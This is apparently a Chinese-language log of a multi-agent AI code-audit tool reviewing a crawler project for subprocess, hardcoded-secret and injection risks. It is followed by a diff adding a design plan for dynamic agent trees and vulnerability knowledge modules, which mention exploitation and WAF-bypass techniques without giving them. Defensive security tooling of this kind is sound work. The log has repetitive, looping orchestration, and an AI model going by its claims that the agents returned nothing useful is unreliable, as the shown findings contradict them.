Thought: 我已经看到了config.py文件的部分内容这是一个使用pydantic-settings的配置文件包含多个API密钥和配置项。我注意到配置文件中有很多API密钥字段这些如果被泄露会很危险。
现在我已经对项目有了基本了解接下来我应该使用semgrep进行静态分析这样可以系统地发现潜在的安全问题。semgrep可以检测多种漏洞类型包括SQL注入、XSS、命令注入等。
14:31:22
Completed: semgrep_scan
Analysis
2406ms
Input:
{
"rules": "auto",
"max_results": 50
}
Output:
null
14:31:27
Analysis
Thought: semgrep工具未安装我需要使用其他工具进行安全分析。我可以使用pattern_match工具来检测常见的危险模式或者使用bandit_scan如果项目是Python的。从项目结构来看这是一个Python项目所以我可以尝试使用bandit_scan。
14:31:29
Completed: bandit_scan
Analysis
4ms
14:31:31
Analysis
Thought: 看来bandit工具也未安装。我需要使用其他方法进行安全分析。我可以使用pattern_match工具来检测常见的危险模式或者使用search_code工具搜索特定的关键字。让我先使用pattern_match来检测一些常见的危险模式。
首先我需要读取一些关键文件的内容然后使用pattern_match进行分析。让我先读取MindSpider/main.py因为从项目结构看这似乎是一个主要组件。
14:31:35
Completed: read_file
Analysis
5ms
14:31:57
Analysis
Thought: 我已经看到了MindSpider/main.py文件的部分内容这是一个AI爬虫项目的主程序。我注意到一些潜在的安全问题
1. 使用了subprocess模块
2. 数据库连接字符串构建
3. 使用了pymysql和sqlalchemy进行数据库操作
让我继续读取这个文件的剩余部分然后使用pattern_match工具来检测常见的危险模式。
14:32:01
Completed: read_file
Analysis
1ms
14:32:03
Analysis
Thought: 我已经看到了MindSpider/main.py文件的更多内容这个文件使用了subprocess模块来执行其他Python脚本这可能是命令注入的风险点。现在让我使用pattern_match工具来检测常见的危险模式包括SQL注入、命令注入、路径遍历等。
14:32:41
Completed: pattern_match
Analysis
4ms
14:32:42
Analysis
Thought: pattern_match工具没有检测到已知的危险模式但我注意到代码中使用了subprocess.run来执行命令这仍然是一个潜在的安全风险。让我继续检查其他关键文件特别是那些处理用户输入或执行外部命令的文件。
让我先检查MindSpider/DeepSentimentCrawling/main.py文件因为从项目结构看这似乎是另一个主要组件。
14:32:46
Completed: read_file
Analysis
2ms
14:32:47
Analysis
Thought: 我已经看到了MindSpider/DeepSentimentCrawling/main.py文件的部分内容这是一个爬虫模块。我注意到它使用了PlatformCrawler来执行爬取任务这可能涉及网络请求。让我继续查看这个文件的剩余部分然后检查platform_crawler.py文件因为它可能包含更多的安全敏感代码。
14:32:51
Completed: read_file
Analysis
0ms
14:32:52
Analysis
Thought: 我已经看到了MindSpider/DeepSentimentCrawling/main.py文件的完整内容这是一个爬虫模块它使用了PlatformCrawler来执行爬取任务。现在我需要检查platform_crawler.py文件因为它可能包含更多的安全敏感代码特别是网络请求和用户输入处理部分。
14:32:55
Completed: read_file
Analysis
1ms
14:32:57
Analysis
Thought: 我已经看到了platform_crawler.py文件的部分内容这个文件负责配置和调用MediaCrawler进行多平台爬取。我注意到一些潜在的安全问题
1. 使用subprocess模块执行外部命令
2. 文件操作可能存在路径遍历风险
3. 数据库配置信息被硬编码写入文件
让我继续查看这个文件的剩余部分然后使用search_code工具搜索一些特定的危险模式如eval、exec、subprocess等。
14:33:01
Completed: read_file
Analysis
20ms
14:33:03
Analysis
Thought: 我已经看到了platform_crawler.py文件的更多内容这个文件使用了subprocess.run来执行MediaCrawler的main.py脚本这是一个潜在的安全风险。现在让我使用search_code工具搜索一些特定的危险模式如eval、exec、subprocess等以便更全面地发现潜在的安全问题。
14:33:06
Completed: search_code
Analysis
287ms
14:33:07
Analysis
Thought: 我发现了多个使用subprocess的地方这些是潜在的安全风险点。现在让我搜索其他危险模式如eval、exec、query等以便更全面地发现潜在的安全问题。
14:33:10
Completed: search_code
Analysis
200ms
14:33:11
Analysis
Thought: 我发现了一些使用eval的地方大多数是Playwright的page.evaluate方法用于在浏览器中执行JavaScript代码。这些通常是安全的因为它们是在浏览器上下文中执行的。现在让我搜索exec和其他潜在的危险模式。
14:33:14
Completed: search_code
Analysis
157ms
14:33:16
Analysis
Thought: 我发现了一些使用exec的地方大多数是数据库操作或执行外部命令。现在让我搜索query和其他潜在的危险模式特别是SQL查询相关的代码。
14:33:18
Completed: search_code
Analysis
5ms
14:33:20
Analysis
Thought: 我已经搜索了subprocess、eval、exec和query等关键字发现了一些潜在的安全风险点。现在让我使用dataflow_analysis工具来分析一些关键的数据流特别是用户输入如何流向可能危险的函数。
14:33:27
Completed: dataflow_analysis
Analysis
65427ms
14:34:34
Analysis
让我继续分析其他潜在的安全风险点。我将检查一些关键的Python文件看看是否有明显的安全问题。
14:34:36
Completed: read_file
Analysis
6ms
14:34:38
Analysis
Thought: 我已经看到了keyword_manager.py文件的部分内容这个文件负责管理关键词和数据库操作。我注意到它使用了SQLAlchemy进行数据库操作并且使用了参数化查询这有助于防止SQL注入。让我继续查看这个文件的剩余部分然后检查其他可能存在安全问题的文件。
14:34:42
Completed: read_file
Analysis
2ms
14:35:04
Analysis
Thought: 我已经看到了keyword_manager.py文件的完整内容这个文件使用了SQLAlchemy进行数据库操作并且使用了参数化查询这有助于防止SQL注入。现在让我检查.env.example文件看看是否有敏感信息泄露的风险。
14:35:07
Completed: read_file
Analysis
5ms
14:35:09
Analysis
Thought: 我已经看到了.env.example文件这是一个环境变量配置示例文件包含了各种API密钥和配置项。这个文件本身不包含敏感信息因为它只是示例但需要注意在实际使用时.env文件可能包含敏感信息。
现在让我使用gitleaks_scan工具来检查代码中是否有密钥泄露或其他敏感信息。
14:35:12
Completed: gitleaks_scan
Analysis
73ms
14:35:18
Analysis
Thought: 由于gitleaks工具未安装我无法使用它来检测密钥泄露。让我使用search_code工具搜索一些常见的敏感信息模式如API密钥、密码等。
14:35:20
Completed: search_code
Analysis
31ms
14:35:22
Analysis
Thought: 我已经搜索了api_key关键字发现了很多API密钥的配置。这些API密钥是通过环境变量或配置文件管理的这是好的做法。现在让我搜索一些其他可能的敏感信息如密码、密钥等。
14:35:25
Completed: search_code
Analysis
460ms
14:35:27
Analysis
Thought: 我已经搜索了password关键字发现了很多数据库密码的配置。这些密码是通过环境变量或配置文件管理的这是好的做法。现在让我总结一下我的分析结果并提供一个安全漏洞报告。
基于我的分析,我发现了以下潜在的安全问题:
1. 使用subprocess执行外部命令 - 在多个文件中发现
2. 硬编码的SECRET_KEY - 在app.py中
3. 数据库配置信息被硬编码写入文件 - 在platform_crawler.py中
4. 使用Playwright的page.evaluate执行JavaScript代码 - 在多个爬虫客户端中
让我使用think工具来总结我的分析结果。
14:35:44
Completed: think
Analysis
0ms
14:35:54
Analysis
Thought: 基于我的分析我现在可以提供一个完整的安全漏洞报告。我将使用Final Answer格式来总结我的发现。
14:36:51
Analysis
Thought: 我需要使用正确的工具格式来输出我的分析结果。让我使用think工具来总结我的分析然后提供最终的安全漏洞报告。
14:37:02
Completed: think
Analysis
0ms
14:37:05
Analysis
Thought: 我已经完成了对项目的安全分析并记录了我的评估结果。现在我将使用reflect工具来总结我的分析进展和发现。
14:37:26
Completed: reflect
Analysis
165ms
14:37:35
Analysis
Thought: 我已经完成了对项目的安全分析,并记录了我的发现和评估。现在我将总结我的分析结果,并提供一个完整的安全漏洞报告。
基于我的分析,我发现了以下潜在的安全问题:
1. **命令注入风险**在多个文件中使用subprocess.run执行外部命令包括app.py、MindSpider/main.py和platform_crawler.py。虽然当前命令参数是硬编码的但如果未来修改为接受用户输入可能存在命令注入风险。
2. **硬编码的SECRET_KEY**在app.py第36行Flask应用的SECRET_KEY是硬编码的这降低了密钥的安全性。
3. **数据库配置信息硬编码写入文件**在platform_crawler.py中数据库配置信息被硬编码写入MediaCrawler的配置文件中这可能导致敏感信息泄露。
4. **JavaScript代码执行**在多个爬虫客户端中使用Playwright的page.evaluate方法执行JavaScript代码虽然这些通常是在浏览器上下文中执行的但如果用户输入被不当处理可能存在XSS风险。
总体而言项目在敏感信息管理方面做得较好使用了参数化查询防止SQL注入但需要注意subprocess使用和硬编码密钥的问题。
14:37:51
Analysis
Action
14:37:59
Completed: think
Analysis
19ms
14:37:59
✅ analysis Agent 完成
Orchestrator
14:38:00
Orchestrator
Thought: analysis Agent 也没有返回任何有用的信息。这可能是因为项目文件结构复杂,或者 Agent 需要更具体的指导。我将尝试一个更直接的方法,先查看项目的根目录文件,特别是配置文件和主要入口文件,然后再进行深入分析。
14:38:05
📤 调度 recon Agent: 查看项目根目录下的所有文件特别关注config.py, app.py, report_engine_only.py, requirements.txt等关键文件...
Orchestrator
14:38:15
Recon
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和主要文件。这将帮助我识别项目类型、技术栈和可能的入口点。我将从列出根目录开始。
14:38:38
Completed: list_files
Recon
15ms
14:38:39
Recon
Thought: 从文件列表中,我可以看到这是一个包含多个组件的项目,主要有:
1. MediaEngine - 一个Python模块包含LLM相关功能
2. MindSpider - 一个爬虫项目包含DeepSentimentCrawling组件
3. 一些根级别的Python文件如app.py, config.py等
我需要进一步了解项目的技术栈和结构。首先我应该查看根目录下的配置文件如requirements.txt、package.json等以了解项目依赖和使用的框架。
14:38:44
Completed: read_file
Recon
0ms
14:38:45
Recon
Thought: 从requirements.txt文件中我可以看到这是一个舆情分析系统使用了多种技术栈
1. Web框架Flask, FastAPI, Streamlit
2. 数据库MySQL, PostgreSQL, SQLite, Redis
3. 爬虫技术Playwright, BeautifulSoup等
4. LLM集成OpenAI API
5. 数据处理pandas, numpy等
现在我需要查看MindSpider/DeepSentimentCrawling/MediaCrawler目录下的package.json文件以了解前端依赖。
14:38:51
Completed: read_file
Recon
8ms
14:38:52
Recon
Thought: package.json文件显示这是一个使用VitePress的文档项目没有前端应用依赖。现在我需要查看主要的入口点文件如app.py、MindSpider/main.py等以了解应用程序的入口点和主要功能。
14:38:55
Completed: read_file
Recon
3ms
14:38:57
Recon
Thought: app.py文件很长我需要继续查看更多内容来了解应用程序的主要功能和入口点。让我继续读取文件的剩余部分。
14:39:20
Completed: read_file
Recon
2ms
14:39:21
Recon
Thought: 我需要继续查看app.py文件的更多内容特别是路由定义部分以了解应用程序的API端点。让我继续读取文件的后续部分。
14:39:24
Completed: read_file
Recon
2ms
14:39:45
Recon
Thought: 我需要继续查看app.py文件特别是路由定义部分以了解应用程序的API端点。让我继续读取文件的后续部分。
14:39:50
Completed: read_file
Recon
6ms
14:40:57
Recon
Thought: 我需要继续查看app.py文件的最后部分以了解所有的API路由。让我读取文件的剩余部分。
14:41:04
Completed: read_file
Recon
23ms
14:41:37
Recon
Thought: 我需要查看app.py文件的最后部分以了解所有的API路由。让我读取文件的最后部分。
14:41:40
Completed: read_file
Recon
5ms
14:42:03
Recon
Thought: 现在我已经查看了app.py文件了解了主要的API路由和应用程序结构。接下来我需要查看MindSpider/main.py文件以了解爬虫组件的主要功能。
14:42:08
Completed: read_file
Recon
3ms
14:42:16
Recon
Thought: 我需要继续查看MindSpider/main.py文件的剩余部分以了解爬虫组件的主要功能。
14:42:18
Completed: read_file
Recon
1ms
14:43:42
Recon
Thought: 我需要继续查看MindSpider/main.py文件的剩余部分以了解爬虫组件的主要功能。
14:43:45
Completed: read_file
Recon
4ms
14:43:48
Recon
Thought: 现在我已经查看了MindSpider/main.py文件了解了爬虫组件的主要功能。接下来我需要查看配置文件以了解项目的配置结构和敏感信息。
14:43:51
Completed: read_file
Recon
5ms
14:43:53
Recon
Thought: 我需要继续查看config.py文件的剩余部分以了解项目的完整配置结构。
14:43:55
Completed: read_file
Recon
0ms
14:43:57
Recon
Thought: 现在我已经查看了config.py文件了解了项目的配置结构。接下来我需要查看.env.example文件以了解环境变量的配置示例。
14:44:00
Completed: read_file
Recon
14ms
14:44:00
✅ recon Agent 完成
Orchestrator
14:44:00
Orchestrator
Thought: 多次尝试使用 recon 和 analysis Agent 都没有返回任何有用的信息。这可能是因为项目结构复杂或者 Agent 无法正确访问文件。我将尝试一个更直接的方法,先查看项目的根目录文件,特别关注配置文件和主要入口文件,然后再进行深入分析。
14:44:04
📤 调度 recon Agent: 查看项目根目录下的所有文件特别关注config.py, app.py, report_engine_only.py, requirements.txt等关键文件...
Orchestrator
14:45:23
Recon
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和主要文件。这将帮助我识别项目类型、技术栈和关键组件。我将从列出根目录的内容开始。
14:45:26
Completed: list_files
Recon
2ms
14:46:04
Recon
Thought: 我已经看到了项目的根目录结构。这是一个多引擎的项目包含多个子模块如ForumEngine、InsightEngine、MediaEngine等。我注意到根目录下有app.py和config.py这表明这可能是一个Python项目。接下来我应该查看requirements.txt文件来了解项目的依赖和技术栈同时也要查看config.py来了解项目配置。
14:46:07
Completed: read_file
Recon
0ms
14:46:08
Recon
Thought: 从requirements.txt文件可以看出这是一个基于Python的舆情分析系统使用了多种技术栈
1. Web框架Flask、Streamlit、FastAPI
2. 数据库MySQL (pymysql, aiomysql)、SQLite (aiosqlite)、Redis、PostgreSQL (asyncpg)
3. 数据处理pandas, numpy, jieba (中文分词)
4. 机器学习torch, transformers, sentence-transformers等
5. 爬虫playwright, beautifulsoup4等
6. 可视化plotly, matplotlib, wordcloud
接下来我应该查看config.py文件来了解项目的配置信息然后查看app.py作为主入口点。
14:46:14
Completed: read_file
Recon
1ms
14:46:15
Recon
Thought: 从config.py文件可以看出这是一个复杂的舆情分析系统包含多个AI代理引擎Insight Engine、Media Engine、Query Engine、Report Engine、MindSpider等。系统使用Flask作为Web框架支持多种数据库MySQL、PostgreSQL并集成了多个LLM API如Kimi、Gemini、DeepSeek等
接下来我应该查看app.py文件这是主入口点可以了解系统的路由和主要功能。
14:46:18
Completed: read_file
Recon

View File

@ -0,0 +1,527 @@
DeepAudit Agent 架构重构升级方案
一、现状分析
当前 DeepAudit 架构特点
DeepAudit 目前采用基于 LangGraph 的固定流程图架构。整个审计流程按照 Recon信息收集→ Analysis漏洞分析→ Verification漏洞验证→ Report报告生成的线性顺序执行。每个阶段由一个专门的 Agent 负责Agent 之间通过 TaskHandoff 机制传递结构化的上下文信息。
这种架构的优点是流程清晰、易于理解和调试,但存在几个明显的局限性:
第一,流程过于固定。无论面对什么类型的项目或漏洞,都必须走完整个流程,无法根据实际发现动态调整策略。比如发现了一个 SQL 注入线索,无法立即深入分析,必须等待 Analysis 阶段统一处理。
第二Agent 专业化程度不足。Analysis Agent 需要同时处理所有类型的漏洞,从 SQL 注入到 XSS 到 SSRF这导致系统提示词过于庞大LLM 难以在每种漏洞类型上都表现出专家级水平。
第三缺乏动态协作能力。Agent 之间只能按照预设的顺序传递信息,无法根据需要动态创建新的 Agent 或在 Agent 之间进行实时通信。
Strix 架构的启示
Strix 是一个开源的 AI 安全测试 Agent 项目,它采用了完全不同的架构理念。通过深入分析 Strix 的设计,我们可以获得以下关键启示:
Strix 的核心是动态 Agent 树结构。根 Agent 可以根据任务需要随时创建子 Agent每个子 Agent 专注于特定的漏洞类型或任务。子 Agent 完成后向父 Agent 汇报结果,父 Agent 可以根据结果决定是否需要创建更多子 Agent 或进行其他操作。
Strix 的另一个亮点是模块化的专业知识系统。它为每种漏洞类型都准备了详细的 Jinja2 模板,包含该漏洞的检测方法、利用技术、绕过手段、验证步骤等专业知识。创建 Agent 时可以指定加载哪些知识模块,让 Agent 在特定领域具备专家级能力。
此外Strix 还实现了 Agent 间的消息传递机制、完善的状态管理、工具的沙箱执行、LLM 调用优化等高级特性。
二、升级后的整体架构
核心设计理念
升级后的 DeepAudit 将采用"动态 Agent 协作 + 专业知识模块 + 智能编排"的三层架构。
最底层是专业知识模块层,包含各种漏洞类型、框架、技术栈的专业知识库。这些知识以模板形式存储,可以按需加载到 Agent 的系统提示词中。
中间层是 Agent 执行层,包含可动态创建和销毁的 Agent 实例。每个 Agent 都有完整的生命周期管理,可以执行任务、调用工具、与其他 Agent 通信。
最上层是智能编排层,负责根据审计目标和实时发现来协调整个审计流程,决定何时创建什么类型的 Agent如何分配任务何时结束审计。
动态 Agent 树
与当前固定的四阶段流程不同,升级后的系统将采用动态 Agent 树结构。
审计开始时,系统创建一个根 AgentRoot Agent。根 Agent 首先进行初步的信息收集,了解项目的技术栈、目录结构、入口点等基本信息。然后根据收集到的信息,根 Agent 决定需要创建哪些专业子 Agent。
例如,如果发现项目使用了 SQL 数据库,根 Agent 可能会创建一个专门的 SQL 注入检测 Agent如果发现有用户输入直接渲染到页面的代码可能会创建一个 XSS 检测 Agent如果发现有 HTTP 请求的代码,可能会创建一个 SSRF 检测 Agent。
每个子 Agent 专注于自己的任务领域。当子 Agent 发现可疑的漏洞线索时,它可以进一步创建验证子 Agent 来确认漏洞是否真实存在。验证通过后,还可以创建报告子 Agent 来生成正式的漏洞报告。
这种树状结构的好处是:任务可以无限细分,每个 Agent 都能专注于自己擅长的领域;发现和验证可以并行进行,提高效率;根据实际情况动态调整策略,而不是机械地执行固定流程。
Agent 间通信机制
升级后的系统将实现完善的 Agent 间通信机制。
每个 Agent 都有一个消息队列,其他 Agent 可以向这个队列发送消息。消息类型包括:查询消息(请求信息)、指令消息(要求执行某个操作)、信息消息(分享发现或状态)。
当 Agent 处于等待状态时它会检查自己的消息队列。如果有新消息Agent 会处理消息并可能恢复执行。这种机制使得 Agent 之间可以进行实时协作,而不仅仅是单向的结果传递。
例如SQL 注入检测 Agent 在分析过程中发现某个函数可能存在问题,但需要了解这个函数的调用上下文。它可以向根 Agent 发送查询消息,请求提供相关信息。根 Agent 收到消息后,可以调用代码搜索工具获取信息,然后回复给 SQL 注入检测 Agent。
Agent 状态管理
每个 Agent 都有完整的状态管理,状态信息包括:
基本信息Agent 的唯一标识、名称、父 Agent 标识、创建时间等。
任务信息:当前任务描述、任务上下文、从父 Agent 继承的信息等。
执行状态:当前迭代次数、最大迭代限制、运行状态(运行中、等待中、已完成、失败、已停止)等。
对话历史:与 LLM 的完整对话记录,包括系统提示词、用户消息、助手回复等。
执行记录:已执行的动作列表、观察结果列表、错误记录等。
发现列表:该 Agent 发现的所有漏洞和可疑点。
这种完整的状态管理使得 Agent 可以被暂停和恢复,可以被序列化和持久化,也便于调试和审计。
三、专业知识模块系统
模块化设计
专业知识模块是升级后架构的核心创新之一。我们将为不同的漏洞类型、框架、技术栈创建专门的知识模块。
漏洞类型模块包括SQL 注入、XSS、SSRF、IDOR、认证绕过、远程代码执行、路径遍历、XXE、CSRF、竞态条件、反序列化、业务逻辑漏洞等。每个模块都包含该漏洞类型的完整知识体系。
框架知识模块包括FastAPI、Django、Flask、Express、Next.js、Spring、Laravel 等主流框架。每个模块包含该框架的安全特性、常见漏洞模式、最佳实践等。
技术栈模块包括Supabase、Firebase、GraphQL、gRPC、WebSocket 等。每个模块包含该技术的安全考量和常见问题。
模块内容结构
以 SQL 注入模块为例,它应该包含以下内容:
漏洞概述SQL 注入的定义、危害、影响范围。
检测方法:错误型注入检测、布尔型注入检测、时间型注入检测、带外注入检测的具体技术和判断标准。
数据库特定知识MySQL、PostgreSQL、MSSQL、Oracle 等不同数据库的特有语法、函数、利用技术。
绕过技术WAF 绕过、过滤绕过、编码绕过等高级技术。
ORM 和查询构建器:各种 ORM 框架中容易出现 SQL 注入的 API 和模式。
验证步骤:如何确认漏洞真实存在,如何构造 PoC如何评估影响。
误报识别:哪些情况容易被误判为 SQL 注入,如何排除误报。
修复建议参数化查询、ORM 正确用法、输入验证等修复方案。
模块加载机制
创建 Agent 时,可以指定该 Agent 需要加载哪些知识模块。系统会将这些模块的内容动态注入到 Agent 的系统提示词中。
为了控制提示词长度和保持 Agent 的专注度,每个 Agent 最多加载 5 个知识模块。这个限制迫使我们为每个 Agent 选择最相关的知识,而不是试图让一个 Agent 掌握所有知识。
模块之间可以有依赖关系。例如FastAPI 框架模块可能依赖 Python 安全基础模块GraphQL 模块可能依赖 API 安全基础模块。加载模块时会自动处理这些依赖。
四、工具系统升级
统一的工具注册机制
升级后的工具系统将采用装饰器模式进行统一注册。每个工具都需要提供:工具名称、功能描述、参数定义、返回值说明。
工具按类别组织包括文件操作类读取文件、搜索文件、列出目录、代码分析类模式匹配、数据流分析、AST 分析、外部扫描类Semgrep、Bandit、Gitleaks 等、验证执行类沙箱命令执行、HTTP 请求)、协作类(创建子 Agent、发送消息、等待消息、推理类思考工具、报告类创建漏洞报告
Think 工具
Think 工具是从 Strix 借鉴的关键创新。这是一个让 Agent 进行深度推理的工具Agent 可以用它来:
分析复杂情况当面对复杂的代码逻辑或不确定的漏洞线索时Agent 可以调用 Think 工具进行深入思考。
规划下一步行动:在执行具体操作之前,先用 Think 工具规划策略。
评估发现的严重性:发现可疑点后,用 Think 工具评估其真实性和影响。
决定是否需要创建子 Agent当任务变得复杂时用 Think 工具分析是否需要分解任务。
Think 工具的输出会被记录到 Agent 的对话历史中,帮助 LLM 保持思路的连贯性。
漏洞报告工具
漏洞报告工具是正式记录漏洞的唯一方式。只有通过这个工具创建的漏洞才会被计入最终报告。这个设计确保了漏洞报告的规范性和完整性。
报告工具要求提供完整的漏洞信息漏洞类型、严重程度、标题、详细描述、文件位置、代码片段、PoC、影响分析、修复建议等。
通常只有专门的报告 Agent 才会调用这个工具,确保漏洞在被正式报告之前已经经过了充分的验证。
沙箱执行
涉及代码执行或网络请求的工具都在沙箱环境中运行。沙箱提供资源隔离CPU、内存、网络限制、文件系统隔离、超时控制等安全保障。
沙箱执行通过 Tool Server 机制实现。Agent 发送工具调用请求到 Tool ServerTool Server 在沙箱中执行工具并返回结果。这种设计使得即使工具执行出现问题,也不会影响主系统的稳定性。
五、LLM 调用优化
Prompt Caching
对于支持 Prompt Caching 的 LLM如 Anthropic Claude系统会自动为系统提示词和早期对话添加缓存标记。这样在多轮对话中这些内容只需要处理一次后续调用可以直接使用缓存显著降低 Token 消耗和响应延迟。
缓存策略会根据对话长度动态调整。对于短对话,只缓存系统提示词;对于长对话,会在关键位置添加多个缓存点。
Memory Compression
当对话历史变得很长时,系统会自动进行压缩。压缩策略包括:
移除冗余信息:重复的工具调用结果、过长的代码输出等会被截断或摘要。
合并相似消息:连续的同类型消息可能被合并。
保留关键信息:重要的发现、决策点、错误信息等会被优先保留。
压缩后的对话历史仍然保持语义完整性LLM 可以理解之前发生了什么,但 Token 消耗大大降低。
智能重试
LLM 调用可能因为各种原因失败:网络问题、速率限制、服务不可用等。系统实现了智能重试机制:
对于可重试的错误(如速率限制),会等待适当时间后重试。
对于不可重试的错误(如认证失败),会立即报错并提供清晰的错误信息。
重试时会使用指数退避策略,避免对 LLM 服务造成过大压力。
六、审计流程重构
启动阶段
用户发起审计请求后,系统首先创建根 Agent。根 Agent 加载通用的安全审计知识模块和项目相关的框架知识模块。
根 Agent 的第一个任务是信息收集:扫描项目目录结构、识别技术栈、找出入口点、分析依赖关系。这个阶段类似于当前的 Recon 阶段,但更加灵活。
任务分解阶段
根据信息收集的结果,根 Agent 决定如何分解审计任务。它会考虑:
项目使用了哪些技术?需要创建哪些专业 Agent
有哪些高风险区域?应该优先分析哪些部分?
项目规模如何?需要多少并行 Agent
根 Agent 会创建一批初始的子 Agent每个子 Agent 负责特定的漏洞类型或代码区域。
并行分析阶段
多个子 Agent 并行工作,各自在自己的专业领域进行深入分析。
每个子 Agent 都有自己的工作循环:思考当前状态、选择工具执行、观察结果、决定下一步。这个循环会持续进行,直到 Agent 认为任务完成或达到迭代限制。
子 Agent 在分析过程中可能会发现需要进一步调查的线索。这时它可以创建更专业的子 Agent 来处理,形成多层的 Agent 树。
验证阶段
当分析 Agent 发现可疑的漏洞时,它会创建验证 Agent 来确认漏洞是否真实存在。
验证 Agent 会尝试构造 PoC、进行数据流追踪、在沙箱中测试等。验证通过后验证 Agent 会创建报告 Agent 来生成正式的漏洞报告。
如果验证失败,验证 Agent 会将结果反馈给父 Agent父 Agent 可以决定是否需要进一步调查或将其标记为误报。
汇总阶段
当所有子 Agent 都完成工作后,根 Agent 会汇总所有发现,生成最终的审计报告。
报告包括:发现的所有漏洞(按严重程度排序)、安全评分、技术栈分析、高风险区域标注、修复建议优先级等。
七、可观测性和调试
完整的事件追踪
系统会记录所有重要事件Agent 创建和销毁、工具调用和结果、LLM 请求和响应、Agent 间消息、状态变更等。
这些事件可以实时推送到前端,让用户看到审计的进展。也可以持久化到数据库,用于后续分析和审计。
Agent 树可视化
前端可以展示当前的 Agent 树结构,显示每个 Agent 的状态、任务、发现数量等信息。用户可以点击任何 Agent 查看其详细信息和对话历史。
调试模式
在调试模式下,系统会记录更详细的信息,包括完整的 LLM 提示词和响应、工具执行的详细日志、状态变更的完整历史等。这些信息对于排查问题和优化系统非常有价值。
八、与现有架构的兼容
渐进式迁移
升级不需要一次性完成,可以渐进式进行。
第一步,保持现有的 LangGraph 流程不变,但将 Agent 的状态管理升级为新的模型。
第二步,引入专业知识模块系统,让现有的 Analysis Agent 可以加载不同的知识模块。
第三步,在 Analysis 阶段内部引入子 Agent 机制,允许创建专业的漏洞检测子 Agent。
第四步,逐步放开流程限制,让 Agent 可以更灵活地决定下一步操作。
第五步,完全迁移到动态 Agent 树架构。
保留 LangGraph 的优势
LangGraph 提供了很好的状态管理和检查点机制,这些在新架构中仍然有价值。我们可以将 LangGraph 用于根 Agent 的高层编排,而在子 Agent 层面使用更灵活的动态创建机制。
九、预期收益
更深度的漏洞发现
专业知识模块让每个 Agent 都具备安全专家级别的知识。专注于单一漏洞类型的 Agent 比通用 Agent 更容易发现深层次的问题。
更高的效率
并行的 Agent 执行比串行流程更快。动态任务分解避免了在无关区域浪费时间。
更低的成本
Prompt Caching 和 Memory Compression 显著降低 Token 消耗。专业化的 Agent 使用更短的提示词就能达到更好的效果。
更好的可扩展性
添加新的漏洞类型只需要创建新的知识模块。支持新的框架只需要添加框架知识模块。整个系统的扩展不需要修改核心架构。
更强的可解释性
完整的事件追踪和 Agent 树可视化让用户清楚地了解系统在做什么。Think 工具的输出展示了 Agent 的推理过程。
这个升级方案借鉴了 Strix 的核心设计理念,同时保留了 DeepAudit 的既有优势,通过渐进式迁移降低风险,最终实现一个更强大、更灵活、更专业的安全审计 Agent 系统。
---
## 十、实施进度记录
### 已完成的工作 (2024-12)
#### 1. 核心模块系统 ✅
- `core/state.py`: 增强的Agent状态管理支持完整生命周期
- `core/registry.py`: Agent注册表和动态Agent树管理
- `core/message.py`: Agent间通信机制消息总线
#### 2. 专业知识模块系统 ✅ (基于RAG)
采用模块化文件组织统一使用RAG进行知识检索
```
knowledge/
├── base.py # 基础定义KnowledgeDocument, KnowledgeCategory
├── loader.py # 知识加载器
├── rag_knowledge.py # RAG检索系统
├── tools.py # 知识查询工具
├── vulnerabilities/ # 漏洞类型知识
│ ├── injection.py # SQL注入、NoSQL注入、命令注入、代码注入
│ ├── xss.py # 反射型XSS、存储型XSS、DOM型XSS
│ ├── auth.py # 认证绕过、IDOR、访问控制失效
│ ├── crypto.py # 弱加密、硬编码凭证
│ ├── ssrf.py # SSRF
│ ├── deserialization.py # 不安全的反序列化
│ ├── path_traversal.py # 路径遍历
│ ├── xxe.py # XXE
│ └── race_condition.py # 竞态条件
└── frameworks/ # 框架安全知识
├── fastapi.py # FastAPI安全
├── django.py # Django安全
├── flask.py # Flask安全
├── express.py # Express.js安全
├── react.py # React安全
└── supabase.py # Supabase安全
```
#### 3. Agent基类增强 ✅
- 支持动态Agent树parent_id, 子Agent创建
- Agent间消息通信
- TaskHandoff协作机制
- 知识模块加载
- Memory Compression集成
#### 4. 工具系统 ✅
- `thinking_tool.py`: Think和Reflect工具
- `reporting_tool.py`: 漏洞报告工具
- `agent_tools.py`: Agent协作工具
- CreateSubAgentTool: 动态创建子Agent
- SendMessageTool: Agent间消息发送
- ViewAgentGraphTool: 查看Agent树
- WaitForMessageTool: 等待消息
- AgentFinishTool: 子Agent完成报告
#### 5. LLM调用优化 ✅
- `memory_compressor.py`: 对话历史压缩
- 自动检测是否需要压缩
- 保留关键信息(发现、工具使用、决策、错误)
- 智能摘要生成
- Agent基类集成自动压缩
#### 6. Orchestrator Agent ✅
- LLM驱动的编排决策
- 动态调度子Agent
- ReAct模式执行
### 已完成的工作 (2024-12 续)
#### 7. Prompt Caching ✅
- `llm/prompt_cache.py`: Prompt 缓存管理器
- 支持 Anthropic Claude 的 Prompt Caching
- 动态缓存策略SYSTEM_ONLY, SYSTEM_AND_EARLY, MULTI_POINT
- 缓存统计和效果追踪
- Token 估算工具
- LiteLLM 适配器集成缓存支持
#### 8. 动态Agent树执行器 ✅
- `core/executor.py`: 完整的执行器实现
- `DynamicAgentExecutor`: 动态Agent树执行器
- 并行Agent执行带信号量控制
- 任务依赖管理
- 执行结果汇总
- 超时和取消处理
- `SubAgentExecutor`: 子Agent执行器
- 从父Agent创建和执行子Agent
- 并行子Agent执行
- 结果收集和汇总
- `ExecutionTask`: 执行任务数据结构
- `ExecutionResult`: 执行结果数据结构
#### 9. Agent状态持久化 ✅
- `core/persistence.py`: 持久化模块
- `AgentStatePersistence`: 状态持久化管理器
- 文件系统持久化
- 数据库持久化(可选)
- 检查点列表和清理
- `CheckpointManager`: 检查点管理器
- 自动检查点(按迭代间隔)
- 检查点恢复
- 状态回滚
#### 10. 增强的Agent协作工具 ✅
- `CreateSubAgentTool`: 增强版
- 支持立即执行模式
- 集成SubAgentExecutor
- 上下文传递
- `RunSubAgentsTool`: 批量执行子Agent
- 并行/顺序执行
- 结果汇总
- `CollectSubAgentResultsTool`: 收集子Agent结果
#### 11. 数据库模型扩展 ✅
- `AgentCheckpoint`: Agent检查点模型
- 状态数据存储
- 执行统计
- 检查点类型auto/manual/error/final
- `AgentTreeNode`: Agent树节点模型
- 树结构记录
- 执行状态追踪
- 结果汇总
- Alembic迁移脚本: `007_add_agent_checkpoint_tables.py`
#### 12. API 端点 ✅
- `GET /agent-tasks/{task_id}/agent-tree`: Agent树查询API
- 返回完整的Agent树结构
- 支持运行时内存查询和数据库查询
